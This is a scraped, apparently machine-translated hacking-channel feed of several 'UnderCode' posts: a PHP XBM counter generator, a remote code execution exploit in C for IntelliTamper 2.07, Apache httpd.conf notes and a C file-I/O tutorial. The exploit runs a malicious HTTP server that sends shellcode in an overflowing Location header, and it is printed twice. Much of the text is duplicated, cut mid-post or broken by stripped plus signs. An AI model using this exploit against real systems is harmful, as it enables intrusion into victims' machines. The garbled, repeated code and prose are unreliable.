โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ Make an xbm picture ? by undercode :
> xbm is a simple two-color image bitmap format. It was used more in early cgi. It is currently used on counters.
T.me/UndercOdeTesting
๐ฆLETS START:
<? php
setXBM (1234567890,0);
function setXBM ($ num, $ mode = 0) {
settype ( $ num, "string");
$ mode = $ mode? 0xff: 0x00;
$ int_width = strlen ($ num); // digits
$ count_width = 8; // single number width
$ count_height = 16; // height
$ bitmap = array (
0 => array (0xff, 0xff, 0xff, 0xc3, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0xc3, 0xff, 0xff, 0xff),
1 => array (0xff, 0xff) , 0xff, 0xcf, 0xc7, 0xcf, 0xcf, 0xcf, 0xcf, 0xcf, 0xcf, 0xcf, 0xcf, 0xff, 0xff, 0xff),
2 => array (0xff, 0xff, 0xff, 0xc3, 0x99, 0x9f, 0x9f, 0xcf , 0xe7, 0xf3, 0xf9, 0xf9, 0x81, 0xff, 0xff, 0xff),
3 => array(0xff, 0xff, 0xff, 0xc3, 0x99, 0x9f, 0x9f, 0xc7, 0x9f, 0x9f, 0x9f, 0x99, 0xc3, 0xff, 0xff, 0xff),
4 => array(0xff, 0xff, 0xff, 0xcf, 0xcf, 0xc7, 0xc7, 0xcb, 0xcb, 0xcd, 0x81, 0xcf, 0x87, 0xff, 0xff, 0xff),
5 => array(0xff, 0xff, 0xff, 0x81, 0xf9, 0xf9, 0xf9, 0xc1, 0x9f, 0x9f, 0x9f, 0x99, 0xc3, 0xff, 0xff, 0xff),
6 => array(0xff, 0xff, 0xff, 0xc7, 0xf3, 0xf9, 0xf9, 0xc1, 0x99, 0x99, 0x99, 0x99, 0xc3, 0xff, 0xff, 0xff),
7 => array(0xff, 0xff, 0xff, 0x81, 0x99, 0x9f, 0x9f, 0xcf, 0xcf, 0xe7, 0xe7, 0xf3, 0xf3, 0xff, 0xff, 0xff),
8 => array(0xff, 0xff, 0xff, 0xc3, 0x99, 0x99, 0x99, 0xc3, 0x99, 0x99, 0x99, 0x99, 0xc3, 0xff, 0xff, 0xff),
9 => array(0xff, 0xff, 0xff, 0xc3, 0x99, 0x99, 0x99, 0x99, 0x83, 0x9f, 0x9f, 0xcf, 0xe3, 0xff, 0xff, 0xff)
);
echo "#define counter_width " .($count_width * $int_width)."\r\n";
echo "#define counter_height " .$count_height. "\r\n";
echo "static unsigned char counter_bits[] = {\r\n";
for($i=0; $i<$count_height; ++$i) {
for($j = 0; $j < $int_width; ++$j) {
printf("0x%2x, ",$bitmap[$num[$j]][$i]^$mode);
}
}
Written by Under Code
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ 2020 deadly cve IntelliTamper 2.07 HTTP Header Remote Code Execution Exploit
twitter.com/UndercodeNews
๐ฆ ๐๐ผ๐๐ ๐๐๐ธโ๐ :
IntelliTamper 2.07 Location: HTTP Header Remote Code Execution exploit.
Based on exploit by Koshi (written in Perl). This one should be more
stable. Just for fun and to learn more about win32 exploitation.
by Wojciech Pawlikowski (wojtekp@gmail.com)
/
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define BUFSIZE 1550
#define NOP 0x90
#define RETADDR 0x7c941EED // jmp esp ntdll.dll
/* win32_exec - EXITFUNC=thread CMD=mspaint Size=336 Encoder=Alpha2 http://metasploit.com */
unsigned char shellcode[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x48\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x42"
"\x58\x30\x42\x31\x50\x41\x42\x6b\x41\x41\x52\x41\x32\x41\x41\x32"
"\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x6d\x39\x59\x6c\x69"
"\x78\x41\x54\x75\x50\x77\x70\x45\x50\x6c\x4b\x73\x75\x55\x6c\x4e"
"\x6b\x61\x6c\x33\x35\x54\x38\x55\x51\x7a\x4f\x4c\x4b\x70\x4f\x45"
"\x48\x4c\x4b\x33\x6f\x67\x50\x45\x51\x4a\x4b\x43\x79\x6c\x4b\x34"
"\x74\x4c\x4b\x47\x71\x6a\x4e\x64\x71\x6f\x30\x5a\x39\x6e\x4c\x4e"
"\x64\x4f\x30\x30\x74\x45\x57\x79\x51\x6b\x7a\x74\x4d\x37\x71\x5a"
"\x62\x4a\x4b\x5a\x54\x55\x6b\x31\x44\x71\x34\x55\x54\x71\x65\x4b"
"\x55\x6c\x4b\x73\x6f\x61\x34\x45\x51\x78\x6b\x65\x36\x6c\x4b\x36"
"\x6c\x50\x4b\x4e\x6b\x71\x4f\x57\x6c\x35\x51\x38\x6b\x4c\x4b\x77"
"\x6c\x6e\x6b\x77\x71\x6a\x4b\x4c\x49\x71\x4c\x37\x54\x34\x44\x7a"
"\x63\x54\x71\x39\x50\x61\x74\x6c\x4b\x43\x70\x46\x50\x4b\x35\x49"
"\x50\x72\x58\x46\x6c\x6c\x4b\x47\x30\x36\x6c\x6c\x4b\x70\x70\x37"
"\x6c\x4e\x4d\x4c\x4b\x65\x38\x46\x68\x7a\x4b\x64\x49\x4e\x6b\x4f"
"\x70\x6e\x50\x77\x70\x77\x70\x45\x50\x6c\x4b\x70\x68\x37\x4c\x63"
"\x6f\x64\x71\x49\x66\x73\x50\x31\x46\x6e\x69\x59\x68\x4b\x33\x69"
"\x50\x51\x6b\x30\x50\x32\x48\x5a\x4f\x5a\x6e\x69\x70\x45\x30\x33"
"\x58\x4c\x58\x6b\x4e\x4c\x4a\x76\x6e\x66\x37\x6b\x4f\x7a\x47\x30"
"\x6d\x53\x43\x62\x50\x53\x51\x73\x59\x32\x4e\x33\x44\x45\x50\x42";
int
main(void)
{
struct sockaddr_in serv_sin, cli_sin;
int i, sockfd, cli_sock, sock_opt = 1, sin_len;
char *overflow, buf[BUFSIZE] = { 0 }, req[BUFSIZE 100] = { 0 };
sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (sockfd < 0)
{
perror("socket()");
exit(-1);
}
serv_sin.sin_family = AF_INET;
serv_sin.sin_port = htons(80);
serv_sin.sin_addr.s_addr = INADDR_ANY;
if (setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &sock_opt, sizeof(int)) < 0)
{
perror("setsockopt()");
close(sockfd);
exit(-1);
}
if (bind(sockfd, (struct sockaddr *)&serv_sin, sizeof(struct sockaddr)) < 0)
{
perror("bind()");
close(sockfd);
exit(-1);
}
listen(sockfd, 1);
sin_len = sizeof(struct sockaddr);
printf("[*] Waiting for a connection...\n");
while (1)
{
cli_sock = accept(sockfd, (struct sockaddr *)&cli_sin, &sin_len);
if (cli_sock < 0)
{
perror("accept()");
exit(-1);
}
printf("[ ] Connection from %s:%d\n", inet_ntoa(cli_sin.sin_addr), ntohs(cli_sin.sin_port));
read(cli_sock, buf, sizeof(buf) - 1);
overflow = (char *)malloc(BUFSIZE 1);
for (i = 0; i <= 1540; i = 4)
*(long *)&overflow[i] = RETADDR;
for (i = 0; i < 1536; i )
overflow[i] = NOP;
memcpy(overflow 550, shellcode, strlen(shellcode));
memcpy(overflow i 4, "\xe9\x14\xfc\xff\xff", 5); // jmp -1000 - jump to our buffer
i = sprintf(req, "200 HTTP/1.1\r\nDate: 2008-07-24 20:14:31\r\nLocation: ");
memcpy(req i, overflow, strlen(overflow));
memcpy(req i strlen(overflow), "\r\n\r\n", 4);
write(cli_sock, req, strlen(req));
printf("[ ] Exploit sent!\n");
close(cli_sock);
}
close(sockfd);
}
Written by UnderCode
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ 2020 deadly cve IntelliTamper 2.07 HTTP Header Remote Code Execution Exploit
twitter.com/UndercodeNews
๐ฆ ๐๐ผ๐๐ ๐๐๐ธโ๐ :
IntelliTamper 2.07 Location: HTTP Header Remote Code Execution exploit.
Based on exploit by Koshi (written in Perl). This one should be more
stable. Just for fun and to learn more about win32 exploitation.
by Wojciech Pawlikowski (wojtekp@gmail.com)
/
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define BUFSIZE 1550
#define NOP 0x90
#define RETADDR 0x7c941EED // jmp esp ntdll.dll
/* win32_exec - EXITFUNC=thread CMD=mspaint Size=336 Encoder=Alpha2 http://metasploit.com */
unsigned char shellcode[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x48\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x42"
"\x58\x30\x42\x31\x50\x41\x42\x6b\x41\x41\x52\x41\x32\x41\x41\x32"
"\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x6d\x39\x59\x6c\x69"
"\x78\x41\x54\x75\x50\x77\x70\x45\x50\x6c\x4b\x73\x75\x55\x6c\x4e"
"\x6b\x61\x6c\x33\x35\x54\x38\x55\x51\x7a\x4f\x4c\x4b\x70\x4f\x45"
"\x48\x4c\x4b\x33\x6f\x67\x50\x45\x51\x4a\x4b\x43\x79\x6c\x4b\x34"
"\x74\x4c\x4b\x47\x71\x6a\x4e\x64\x71\x6f\x30\x5a\x39\x6e\x4c\x4e"
"\x64\x4f\x30\x30\x74\x45\x57\x79\x51\x6b\x7a\x74\x4d\x37\x71\x5a"
"\x62\x4a\x4b\x5a\x54\x55\x6b\x31\x44\x71\x34\x55\x54\x71\x65\x4b"
"\x55\x6c\x4b\x73\x6f\x61\x34\x45\x51\x78\x6b\x65\x36\x6c\x4b\x36"
"\x6c\x50\x4b\x4e\x6b\x71\x4f\x57\x6c\x35\x51\x38\x6b\x4c\x4b\x77"
"\x6c\x6e\x6b\x77\x71\x6a\x4b\x4c\x49\x71\x4c\x37\x54\x34\x44\x7a"
"\x63\x54\x71\x39\x50\x61\x74\x6c\x4b\x43\x70\x46\x50\x4b\x35\x49"
"\x50\x72\x58\x46\x6c\x6c\x4b\x47\x30\x36\x6c\x6c\x4b\x70\x70\x37"
"\x6c\x4e\x4d\x4c\x4b\x65\x38\x46\x68\x7a\x4b\x64\x49\x4e\x6b\x4f"
"\x70\x6e\x50\x77\x70\x77\x70\x45\x50\x6c\x4b\x70\x68\x37\x4c\x63"
"\x6f\x64\x71\x49\x66\x73\x50\x31\x46\x6e\x69\x59\x68\x4b\x33\x69"
"\x50\x51\x6b\x30\x50\x32\x48\x5a\x4f\x5a\x6e\x69\x70\x45\x30\x33"
"\x58\x4c\x58\x6b\x4e\x4c\x4a\x76\x6e\x66\x37\x6b\x4f\x7a\x47\x30"
"\x6d\x53\x43\x62\x50\x53\x51\x73\x59\x32\x4e\x33\x44\x45\x50\x42";
int
main(void)
{
struct sockaddr_in serv_sin, cli_sin;
int i, sockfd, cli_sock, sock_opt = 1, sin_len;
char *overflow, buf[BUFSIZE] = { 0 }, req[BUFSIZE 100] = { 0 };
sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (sockfd < 0)
{
perror("socket()");
exit(-1);
}
serv_sin.sin_family = AF_INET;
serv_sin.sin_port = htons(80);
serv_sin.sin_addr.s_addr = INADDR_ANY;
if (setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &sock_opt, sizeof(int)) < 0)
{
perror("setsockopt()");
close(sockfd);
exit(-1);
}
if (bind(sockfd, (struct sockaddr *)&serv_sin, sizeof(struct sockaddr)) < 0)
{
perror("bind()");
close(sockfd);
exit(-1);
}
listen(sockfd, 1);
sin_len = sizeof(struct sockaddr);
printf("[*] Waiting for a connection...\n");
while (1)
{
cli_sock = accept(sockfd, (struct sockaddr *)&cli_sin, &sin_len);
if (cli_sock < 0)
{
perror("accept()");
exit(-1);
}
printf("[ ] Connection from %s:%d\n", inet_ntoa(cli_sin.sin_addr), ntohs(cli_sin.sin_port));
read(cli_sock, buf, sizeof(buf) - 1);
overflow = (char *)malloc(BUFSIZE 1);
for (i = 0; i <= 1540; i = 4)
*(long *)&overflow[i] = RETADDR;
for (i = 0; i < 1536; i )
overflow[i] = NOP;
memcpy(overflow 550, shellcode, strlen(shellcode));
memcpy(overflow i 4, "\xe9\x14\xfc\xff\xff", 5); // jmp -1000 - jump to our buffer
i = sprintf(req, "200 HTTP/1.1\r\nDate: 2008-07-24 20:14:31\r\nLocation: ");
memcpy(req i, overflow, strlen(overflow));
memcpy(req i strlen(overflow), "\r\n\r\n", 4);
write(cli_sock, req, strlen(req));
printf("[ ] Exploit sent!\n");
close(cli_sock);
}
close(sockfd);
}
Written by UnderCode
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆHOSTING BY UNDERCODE TUTORIAL FOR BEGINER
t.me/UnderCodeTesting
๐ฆ ๐๐ผ๐๐ ๐๐๐ธโ๐ :
> httpd.conf file comments for Apache ServerThe reference here is the Apache Server
1) ServerType standalone #Set whether the
server is to be started in standalone mode or by the internet server program inetd. The former is generally used.
2) ServerRoot "d: / Apache" #Set the home
directory of the server, which is used to store server settings files, error files, and log files.
3) PidFile logs / httpd.pid #When the
program starts, save the process ID (process id) of the parent process httpd in this file. This file name can be changed with the PidFile command.
4) ScoreBoardFile logs / apache_status #Set
the log files of some execution programs of the WWW server on the network.
#ResourceConfig conf / srm.conf
#AccessConfig conf / access.conf #The
contents of these two files are already included in the httpd.conf file.
5) Timeout 300 #If the
client has not been connected for 300 seconds, or the server has not transmitted data to the client for 300 seconds, it will automatically disconnect.
6) KeepAlive On #Set
whether to support the resume function.
7) MaxKeepAliveRequests 100 #Set
the number of functions that support resume transmission . The larger the number, the more hard disk space is wasted. Set to 0 for more than continuous transmission.
8) KeepAliveTimeout 15 #If
the user has not sent a request to the server after 15 seconds, then he cannot resume the transmission.
9) MaxRequestsPerChild 0
#Set the number of child processes in the same time.
ThreadsPerChild 50 #Set
the number of processes used by the server.
#Listen 3000
#Listen 12.34.56.78:80 #Allow
access to the server using another port or IP. In this example, the Port is 3000 and the IP is 12.34.56.78:80.
#BindAddress * #Set
Apache to listen on all IP, you can also specify it specifically.
#LoadModule anon_auth_module modules / ApacheModuleAuthAnon.dll
... #Open
the module that is not currently active.
#ExtendedStatus On #Set
the status information generated by the server.
๐ฆ The reference here is the Apache Server1_3_12_win32 version.
Port 80 #Set the port
used by the server.
ServerAdmin you@your.address #Set
the E-Mail address of the server administrator.
#ServerName new.host.name
#Host name of the server. If you have a fixed IP address, you don't need to set it.
DocumentRoot "d: / Apache / htdocs" #Set
the directory where the html files of the site are stored.
<Directory />
Options FollowSymLinks
AllowOverride None
</ Directory>
๐ฆ # Set / Directory directive. Specifically:
Option: defines the operations that can be performed in the directory. None means that you can only browse. FollowSymLinks allows pages to be connected elsewhere. ExecCGI allows CGI to be performed. MultiViews allows you to watch animations or listen to music. Indexes allows the server to return a formatted list of directories. Includes allows SSI. These settings can be checked. All can do anything but excludes MultiViews.
AllowOverride: Adding the None parameter means that anyone can browse the files in this directory. Other parameters are: FileInfo, AuthConfig, Limit.
UserDir "d: / Apache / users /"
#Define the directory where users store html files.
DirectoryIndex index.html #Defines
the file to be displayed first.
AccessFileName .htaccess #Define
the name of the access control file for each directory.
#CacheNegotiatedDocsDefines the
proxy server not to cache your pages. Not recommended for use.
UseCanonicalName On #The
server uses the server name specified by ServerName and the port address specified by Port.
WRITTEN BY UNDERCODE
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆHOSTING BY UNDERCODE TUTORIAL FOR BEGINER
t.me/UnderCodeTesting
๐ฆ ๐๐ผ๐๐ ๐๐๐ธโ๐ :
> httpd.conf file comments for Apache ServerThe reference here is the Apache Server
1) ServerType standalone #Set whether the
server is to be started in standalone mode or by the internet server program inetd. The former is generally used.
2) ServerRoot "d: / Apache" #Set the home
directory of the server, which is used to store server settings files, error files, and log files.
3) PidFile logs / httpd.pid #When the
program starts, save the process ID (process id) of the parent process httpd in this file. This file name can be changed with the PidFile command.
4) ScoreBoardFile logs / apache_status #Set
the log files of some execution programs of the WWW server on the network.
#ResourceConfig conf / srm.conf
#AccessConfig conf / access.conf #The
contents of these two files are already included in the httpd.conf file.
5) Timeout 300 #If the
client has not been connected for 300 seconds, or the server has not transmitted data to the client for 300 seconds, it will automatically disconnect.
6) KeepAlive On #Set
whether to support the resume function.
7) MaxKeepAliveRequests 100 #Set
the number of functions that support resume transmission . The larger the number, the more hard disk space is wasted. Set to 0 for more than continuous transmission.
8) KeepAliveTimeout 15 #If
the user has not sent a request to the server after 15 seconds, then he cannot resume the transmission.
9) MaxRequestsPerChild 0
#Set the number of child processes in the same time.
ThreadsPerChild 50 #Set
the number of processes used by the server.
#Listen 3000
#Listen 12.34.56.78:80 #Allow
access to the server using another port or IP. In this example, the Port is 3000 and the IP is 12.34.56.78:80.
#BindAddress * #Set
Apache to listen on all IP, you can also specify it specifically.
#LoadModule anon_auth_module modules / ApacheModuleAuthAnon.dll
... #Open
the module that is not currently active.
#ExtendedStatus On #Set
the status information generated by the server.
๐ฆ The reference here is the Apache Server1_3_12_win32 version.
Port 80 #Set the port
used by the server.
ServerAdmin you@your.address #Set
the E-Mail address of the server administrator.
#ServerName new.host.name
#Host name of the server. If you have a fixed IP address, you don't need to set it.
DocumentRoot "d: / Apache / htdocs" #Set
the directory where the html files of the site are stored.
<Directory />
Options FollowSymLinks
AllowOverride None
</ Directory>
๐ฆ # Set / Directory directive. Specifically:
Option: defines the operations that can be performed in the directory. None means that you can only browse. FollowSymLinks allows pages to be connected elsewhere. ExecCGI allows CGI to be performed. MultiViews allows you to watch animations or listen to music. Indexes allows the server to return a formatted list of directories. Includes allows SSI. These settings can be checked. All can do anything but excludes MultiViews.
AllowOverride: Adding the None parameter means that anyone can browse the files in this directory. Other parameters are: FileInfo, AuthConfig, Limit.
UserDir "d: / Apache / users /"
#Define the directory where users store html files.
DirectoryIndex index.html #Defines
the file to be displayed first.
AccessFileName .htaccess #Define
the name of the access control file for each directory.
#CacheNegotiatedDocsDefines the
proxy server not to cache your pages. Not recommended for use.
UseCanonicalName On #The
server uses the server name specified by ServerName and the port address specified by Port.
WRITTEN BY UNDERCODE
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆPROGRAMMING IMPROVE YOUR SKILLS BY UNDERCODE
> Instructions and examples of fopen (), fwrite (), fread () functions (detailed explanation)
twitter.com/undercodeNews
๐ฆ ๐๐ผ๐๐ ๐๐๐ธโ๐ :
open () function:
1) nction:
Businessmen and statistical trends
In C language, the fopen () function is used to open a file at a specified path and obtain a pointer to the file.
2) Function prototype:
FILE * fopen(const char * path,const char * mode);
-path: file path, such as: "F: \ Visual Stdio 2012 \ test.txt"
-mode: File opening method, for example:
"r" opens the file as read-only. The file must exist.
"w" opens the write-only file. If the file exists, the file length is cleared to 0, that is, the content of the file will disappear. If the file does not exist, the file is created.
"w +" opens a readable and writable file. If the file exists, the file length is cleared to zero, that is, the content of the file will disappear. If the file does not exist, the file is created.
"a" opens the write-only file in an additional way. If the file does not exist, the file will be created. If the file exists, the written data will be added to the end of the file, that is, the original content of the file will be retained. (EOF character reserved)
"a +" opens readable and writable files in an additional way. If the file does not exist, it will be created. If the file exists, the written data will be added to the end of the file, that is, the original content of the file will be retained. (The original EOF character is not retained)
"wb" write only opens or creates a binary file, and only allows writing data.
"wb +" read-write opens or creates a binary file, allowing reading and writing.
"ab" additionally opens a binary file and writes data at the end of the file.
"ab +" read and write opens a binary file, allowing reading, or appending data at the end of the file.
--Return value: After the file is successfully opened, the file pointer to the stream will be returned. If the file fails to open, it returns NULL, and the error code is stored in errno.
๐ฆ fwrite () function:
1) Function:
In C language, the fwrite () function is used to write data in a memory area to local text.
2) Function prototype:
size_t fwrite(const void* buffer, size_t size, size_t count, FILE* stream);
-buffer: pointer to data block
-size: the size of each data, the unit is Byte (for example: sizeof (int) is 4)
-count: number of data
-stream: file pointer
Note: The return value varies with the calling format:
(1) Call format: fwrite (buf, siz eof (buf), 1, fp);
Successful write return value is 1 (ie count)
(2) Call format: fwrite (buf, 1, siz eof (buf), fp);
Successful write returns the actual number of data written (unit is Byte)
3) Matters needing attention:
After writing the data, call fclose () to close the stream. Without closing the stream, each time the data is read or written, the file pointer will point to the next pointer to be written or read.
๐ฆ Example description:
Code 1: The following code can write 1024 words (int) to a text file. In the call of fwrite, size is sizeof (int) and count is DATA_SIZE
[cpp] view plain copy
<code class="language-cpp">#include "stdafx.h"
#define _CRT_SECURE_NO_WARNINGS
#include <stdio.h>
#include <stdlib.h>
#define DATA_SIZE 1024
int main ()
{
unsigned int *dataPtr = NULL;
dataPtr = (unsigned int *)malloc(sizeof(int)*DATA_SIZE);
for(unsigned int i=0;i<DATA_SIZE;i++)
{
dataPtr [i] = i; // Initialize the cache area
}
FILE *fp = fopen("F:\\Labwindows cvi\\test.txt","w");
fwrite(dataPtr,sizeof(int),DATA_SIZE,fp);
fclose(fp);
free(dataPtr);
system("pause");
return 0;
}
</code>
Code 2: The following code can also write 1024 words into the text. Although the size in the fwrite function is 1, the count is DATA_SIZE * sizeof (int). Same result as code 1.
// datasave.cpp: defines the entry point of the console application.
//
#include "stdafx.h"
#define _CRT_SECURE_NO_WARNINGS
#include <stdio.h>
#include <stdlib.h>
#define DATA_SIZE 1024
๐ฆPROGRAMMING IMPROVE YOUR SKILLS BY UNDERCODE
> Instructions and examples of fopen (), fwrite (), fread () functions (detailed explanation)
twitter.com/undercodeNews
๐ฆ ๐๐ผ๐๐ ๐๐๐ธโ๐ :
open () function:
1) nction:
Businessmen and statistical trends
In C language, the fopen () function is used to open a file at a specified path and obtain a pointer to the file.
2) Function prototype:
FILE * fopen(const char * path,const char * mode);
-path: file path, such as: "F: \ Visual Stdio 2012 \ test.txt"
-mode: File opening method, for example:
"r" opens the file as read-only. The file must exist.
"w" opens the write-only file. If the file exists, the file length is cleared to 0, that is, the content of the file will disappear. If the file does not exist, the file is created.
"w +" opens a readable and writable file. If the file exists, the file length is cleared to zero, that is, the content of the file will disappear. If the file does not exist, the file is created.
"a" opens the write-only file in an additional way. If the file does not exist, the file will be created. If the file exists, the written data will be added to the end of the file, that is, the original content of the file will be retained. (EOF character reserved)
"a +" opens readable and writable files in an additional way. If the file does not exist, it will be created. If the file exists, the written data will be added to the end of the file, that is, the original content of the file will be retained. (The original EOF character is not retained)
"wb" write only opens or creates a binary file, and only allows writing data.
"wb +" read-write opens or creates a binary file, allowing reading and writing.
"ab" additionally opens a binary file and writes data at the end of the file.
"ab +" read and write opens a binary file, allowing reading, or appending data at the end of the file.
--Return value: After the file is successfully opened, the file pointer to the stream will be returned. If the file fails to open, it returns NULL, and the error code is stored in errno.
๐ฆ fwrite () function:
1) Function:
In C language, the fwrite () function is used to write data in a memory area to local text.
2) Function prototype:
size_t fwrite(const void* buffer, size_t size, size_t count, FILE* stream);
-buffer: pointer to data block
-size: the size of each data, the unit is Byte (for example: sizeof (int) is 4)
-count: number of data
-stream: file pointer
Note: The return value varies with the calling format:
(1) Call format: fwrite (buf, siz eof (buf), 1, fp);
Successful write return value is 1 (ie count)
(2) Call format: fwrite (buf, 1, siz eof (buf), fp);
Successful write returns the actual number of data written (unit is Byte)
3) Matters needing attention:
After writing the data, call fclose () to close the stream. Without closing the stream, each time the data is read or written, the file pointer will point to the next pointer to be written or read.
๐ฆ Example description:
Code 1: The following code can write 1024 words (int) to a text file. In the call of fwrite, size is sizeof (int) and count is DATA_SIZE
[cpp] view plain copy
<code class="language-cpp">#include "stdafx.h"
#define _CRT_SECURE_NO_WARNINGS
#include <stdio.h>
#include <stdlib.h>
#define DATA_SIZE 1024
int main ()
{
unsigned int *dataPtr = NULL;
dataPtr = (unsigned int *)malloc(sizeof(int)*DATA_SIZE);
for(unsigned int i=0;i<DATA_SIZE;i++)
{
dataPtr [i] = i; // Initialize the cache area
}
FILE *fp = fopen("F:\\Labwindows cvi\\test.txt","w");
fwrite(dataPtr,sizeof(int),DATA_SIZE,fp);
fclose(fp);
free(dataPtr);
system("pause");
return 0;
}
</code>
Code 2: The following code can also write 1024 words into the text. Although the size in the fwrite function is 1, the count is DATA_SIZE * sizeof (int). Same result as code 1.
// datasave.cpp: defines the entry point of the console application.
//
#include "stdafx.h"
#define _CRT_SECURE_NO_WARNINGS
#include <stdio.h>
#include <stdlib.h>
#define DATA_SIZE 1024
Twitter
UNDERCODE NEWS (@UndercodeNews) | Twitter
The latest Tweets from UNDERCODE NEWS (@UndercodeNews). We provides you daily hacking News & Security Warning & Technologies news & Bugs reports & Analysis... @UndercodeNews @UndercodeUpdate @iUndercode @DailyCve. Aus/Leb
int main ()
{
unsigned int *dataPtr = NULL;
dataPtr = (unsigned int *)malloc(sizeof(int)*DATA_SIZE);
for(unsigned int i=0;i<DATA_SIZE;i++)
{
dataPtr [i] = i; // Initialize the cache area
}
FILE *fp = fopen("F:\\Labwindows cvi\\test.txt","ab+");
fwrite(dataPtr,1,DATA_SIZE*sizeof(unsigned int),fp);
<pre name="code" class="cpp"> fclose(fp);
<pre name="code" class="cpp"> free(dataPtr);
system("pause"); return 0;}
Code 3: The following code writes 4096 char data to the text. The maximum value of the written data is 255, which is different from the above code 1, 2 because the data type of the buffer area is different
// datasave.cpp: defines the entry point of the console application.
//
#include "stdafx.h"
#define _CRT_SECURE_NO_WARNINGS
#include <stdio.h>
#include <stdlib.h>
#define DATA_SIZE 1024
int main ()
{
unsigned char *dataPtr = NULL;
dataPtr = (unsigned char *) malloc (sizeof (int) * DATA_SIZE); // The area applied for is 4096 chars, that is, the area of โโ1024 words
for(unsigned int i=0;i<DATA_SIZE;i++)
{
dataPtr [i] = i; // Initialize the cache area
}
FILE *fp = fopen("F:\\Labwindows cvi\\test.txt","ab+");
fwrite(dataPtr,sizeof(char),DATA_SIZE*sizeof(int),fp);
fclose(fp);
free(dataPtr);
system("pause");
return 0;
}
Code 4: When applying for an area with the malloc function, it is a char * area that can be applied. Unsigned int data can be installed after forced type conversion.
// datasave.cpp: defines the entry point of the console application.
//
#include "stdafx.h"
#define _CRT_SECURE_NO_WARNINGS
#include <stdio.h>
#include <stdlib.h>
#define DATA_SIZE 1024
int main ()
{
unsigned char *dataPtr = NULL;
unsigned int *Ptr = NULL;
dataPtr = (unsigned char *)malloc(sizeof(int)*DATA_SIZE);
Ptr = (unsigned int *) dataPtr;
for(unsigned int i=0;i<DATA_SIZE;i++)
{
Ptr[i] = i;
}
FILE *fp = fopen("F:\\Labwindows cvi\\test.txt","ab+");
fwrite(Ptr,sizeof(unsigned int),DATA_SIZE,fp);
fclose(fp);
free(dataPtr);
system("pause");
return 0;
}
fread () function:
1) Function:
Read data from a file stream
2) The function prototype is as follows:
size_t fread(void *buffer, size_t size, size_t count, FILE *stream);
-buffer: pointer to data block
-size: the size of each data, the unit is Byte (for example: sizeof (int) is 4)
-count: number of data
-stream: file pointer
Note: The return value varies with the calling format:
(1) Call format: fread (buf, sizeof (buf), 1, fp);
When the reading is successful: when the amount of data read is exactly sizeof (buf) Byte, the return value is 1 (ie count)
Otherwise, the return value is 0 (the amount of read data is less than sizeof (buf))
(2) Call format: fread (buf, 1, sizeof (buf), fp);
The successful return value is the actual number of data read back (unit is Byte)
Code reference:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char *argv[])
{
FILE *filp = NULL;
char fileDir[] = "/home/yangzhiyuan/Documents/test.txt";
char dataPtr[] = "Helloworld";
printf("sizeof(dataPtr) = %ld\n",sizeof(dataPtr));
filp = fopen (fileDir, "w +"); / * readable and writable, create if it does not exist * /
int writeCnt = fwrite (dataPtr, sizeof (dataPtr), 1, filp); / * The return value is 1 * /
// int writeCnt = fwrite (dataPtr, 1, sizeof (dataPtr), filp); / * The return value is 11 * /
printf("writeCnt = %d\n",writeCnt);
fclose(filp);
FILE *fp = NULL;
fp = fopen(fileDir,"r");
char buffer[256];
int readCnt = fread (buffer, sizeof (buffer), 1, fp); / * The return value is 0 * /
// int readCnt = fread (buffer, 1, sizeof (buffer), fp); / * The return value is 11 * /
printf("readCnt = %d\n",readCnt);
fclose(fp);
printf("%s\n",buffer);
exit(0);
}
Note: In this example code, two FILE variables are defined, one for write and one for read. After writing, close the file, then open it, and read. If you use a FILE variable directly, you will get an error!
WRITTEN BY UNDERCODE
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
{
unsigned int *dataPtr = NULL;
dataPtr = (unsigned int *)malloc(sizeof(int)*DATA_SIZE);
for(unsigned int i=0;i<DATA_SIZE;i++)
{
dataPtr [i] = i; // Initialize the cache area
}
FILE *fp = fopen("F:\\Labwindows cvi\\test.txt","ab+");
fwrite(dataPtr,1,DATA_SIZE*sizeof(unsigned int),fp);
<pre name="code" class="cpp"> fclose(fp);
<pre name="code" class="cpp"> free(dataPtr);
system("pause"); return 0;}
Code 3: The following code writes 4096 char data to the text. The maximum value of the written data is 255, which is different from the above code 1, 2 because the data type of the buffer area is different
// datasave.cpp: defines the entry point of the console application.
//
#include "stdafx.h"
#define _CRT_SECURE_NO_WARNINGS
#include <stdio.h>
#include <stdlib.h>
#define DATA_SIZE 1024
